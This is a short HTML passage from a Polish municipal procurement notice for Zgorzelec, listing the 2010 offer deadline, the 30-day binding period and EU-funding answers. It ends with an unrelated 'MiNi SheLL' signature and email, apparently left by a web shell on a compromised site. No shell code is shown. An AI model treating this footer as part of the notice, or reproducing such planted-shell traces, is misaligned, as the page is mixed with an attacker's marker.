<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.07.2010 godzina 10:00, miejsce: w siedzibie  Zamawiającego tj.:
Punkt Obsługi Interesanta
Urząd Miasta w Zgorzelcu, 59-900 Zgorzelec, ul. Domańskiego 7.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com